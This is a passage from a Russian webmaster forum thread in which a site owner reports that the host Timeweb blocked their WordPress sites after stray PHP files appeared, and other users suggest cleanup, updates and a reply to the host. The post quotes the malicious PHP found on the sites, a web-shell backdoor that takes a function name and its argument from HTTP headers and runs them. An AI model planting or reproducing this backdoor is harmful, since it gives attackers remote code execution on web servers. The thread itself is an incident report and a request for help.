Timeweb заблокировал доступ к сайтам за вредоносную активность

12
KC
На сайте с 22.09.2012
Offline
112
KFC
993


Заблочили доступ к сайтам. Нашел левые файлы Php на своих сайтах где стоит WP, на других нет ничего. Т.е.  из за WP .
на одном сайте стоят  только два плагина cyr to lat   и dolly, т.е.  скорей всего не из за плагинов. Темы (шаблоны) у всех разные. 

Может у кого было что-то подобное, что надо сделать чтобы разблокировали?

Они написали такое.

"Скорее всего, вредоносная активность стала результатом взлома вашего аккаунта. Вам необходимо провести аудит безопасности, чтобы проблема не возникла снова."

https://timeweb.com/ru/docs/virtualnyj-hosting/vzlomy-i-zashchita/ustranenie-i-preduprezhdenie-vzlomov/




Такой код в файлах
<?php

if(isset($_COOKIE['dI'])) {
    die('CqomkwO');
}
if (function_exists('getallheaders')) {
    $headers = getallheaders();
} else {
    $headers = array();
    foreach ($_SERVER as $name => $value) {
        if (substr($name, 0, 5) == 'HTTP_') {
            $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
        }
    }
}

if (isset($headers['Large-Allocation'])) {
    $callback = $headers['Large-Allocation'];
    $result = $callback('', $headers['If-Unmodified-Since']($headers['If-Modified-Since']));

Устранение и предупреждение взломов - Виртуальный хостинг - Справочный центр Timeweb
Устранение и предупреждение взломов - Виртуальный хостинг - Справочный центр Timeweb
  • 2022.10.03
  • Timeweb
  • timeweb.com
Утечка информации о реквизитах доступа к панели управления аккаунтом, к FTP и SSH или административной панели используемой CMS. Причины, по которым конфиденциальная информация может попасть к злоумышленникам, как правило, следующие: В первую очередь необходимо найти источник уязвимости, через который был совершен взлом. Чаще всего причина...
-S
На сайте с 10.12.2006
Offline
1355
#1
KFC :
Может у кого было что-то подобное, что надо сделать чтобы разблокировали?

Устранить проблему и не допускать взломы.

S
На сайте с 20.03.2020
Offline
52
#2
KFC :
Может у кого было что-то подобное, что надо сделать чтобы разблокировали?

Написать им что группа специалистов произвела аудит безопасности и закрыла потенциальные уязвимости.

Тем временем самому удалить вредоносные файлы, обновить WP до последних версий если еще не обновили.

S_E_O Алексей - Строительные ссылки
На сайте с 22.07.2006
Offline
309
KFC :
Темы (шаблоны) у всех разные. 

Темы покупали, или скачали с сайтов бесплатных тем?

⚡ Размещение ссылок на 50 строительных сайтах без бирж: ⚡пакет №5 ( https://searchengines.guru/ru/forum/977443 )⚡пакет №1 https://searchengines.guru/ru/forum/922181 ⚡ пакет №2 ( https://searchengines.guru/ru/forum/925481 ), и ⚡пакет №3 ( https://searchengines.guru/ru/forum/938528 ) .
W1
На сайте с 22.01.2021
Offline
297
#4
KFC :
что надо сделать чтобы разблокировали?

Написать им о принятых мерах.
Ну и сами меры принять, естественно - иначе в следующий раз не поверят. А следующий раз может случиться очень скоро.

Мой форум - https://webinfo.guru –Там я всегда на связи
W1
На сайте с 22.01.2021
Offline
297
#5
KFC :
Такой код в файлах

Ниочём.

Vladimir
На сайте с 07.06.2004
Offline
542
#6
KFC :

Такой код в файлах

Пиши в ЛС, чуть позже отвечу, что делать

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
W1
На сайте с 22.01.2021
Offline
297
#7
Vladimir #:
Пиши в ЛС

Тоже штоле такую же тему создать? Даже интересно, что за хрень ты там в личке пишешь. Хотя могу догадаться: "Закрой доступ к каталогу wp-admin, и будет тебе щастье".

KC
На сайте с 22.09.2012
Offline
112
KFC
#8
S_E_O Алексей - Строительные ссылки #:

Темы покупали, или скачали с сайтов бесплатных тем?

темы бесплатные , одна ребут покупная.   может взломали доступ просто логин пароль к аккаунту, а не wp

W1
На сайте с 22.01.2021
Offline
297
#9
KFC #:
может взломали доступ просто логин пароль к аккаунту

Это едва ли.

KC
На сайте с 22.09.2012
Offline
112
KFC
#10
webinfo #:

Это едва ли.

так тех. поддеражка написала что  " Скорее всего, вредоносная активность стала результатом взлома вашего аккаунта"
 хотя сайты не на wp левых файлов не нашел

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий